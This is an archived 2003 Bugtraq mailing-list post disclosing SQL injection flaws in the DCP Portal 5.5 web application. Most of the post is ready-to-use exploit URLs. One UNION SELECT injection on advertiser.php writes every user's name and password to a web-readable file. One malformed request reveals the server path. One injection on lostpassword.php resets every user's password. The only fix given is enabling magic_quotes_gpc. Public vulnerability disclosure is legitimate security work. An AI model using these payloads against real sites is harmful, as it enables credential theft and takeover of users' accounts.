Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

DCP Portal - 5.5 holes
From: Lifo Fifo <lifofifo20 () yahoo com>
Date: 1 Oct 2003 12:08:25 -0000


Never use this product if you have turned off magic_quotes_gpc. And this product won't work anyway if you have turned 
off register_globals.

All the files in the product, dont check for integrity of variables. You can easily exploit this using some SQL 
Injection techniques. For example, if you want to get username/password of all the users, you can exploit 
advertiser.php. 

Open it like,

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select 
uid,name,password,surname,job,email from dcp5_members into outfile 'c:/apache2/htdocs/dcpad.txt

This is for windows, if web-server is running on *nix, then you could enter something like,

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select 
uid,name,password,surname,job,email from dcp5_members into outfile '/var/www/html/dcpad.txt

In this cases, you will need to enter the absolute path. For that, run the follwing

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=' and that will show the path to the sever if they 
have turned on display_errors in php.ini.

That's all ! Notice that here we are using UNION function in query. For that, the host should be running version MySQL 
4.x. Well, if it's not running 4.x, No problem, we have another file !

This time it's lostpassword.php.

Open it like,

http://localhost/dcp/lostpassword.php?action=lost&email=fake' or 1=1--'

This will really cause some damage. It will reset password of everyone. Everyone will get as many mails as the number 
of users. And evryone's password will be the one provided in the last email.

I didn't have time to check if there was injection possible with some numeric field. If it's there, one can launch 
select-fish attacks, which would work even in case of magic_quotes_gpc is on.

Fix : Insteading of fixing it, simply turn on magic_quotes_gpc. Otherwise it will take you as much time as they took in 
making DCP Portal.

-lifofifo
http://www.hackingzone.org/

  By Date           By Thread  

Current thread:
  • DCP Portal - 5.5 holes Lifo Fifo (Oct 01)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]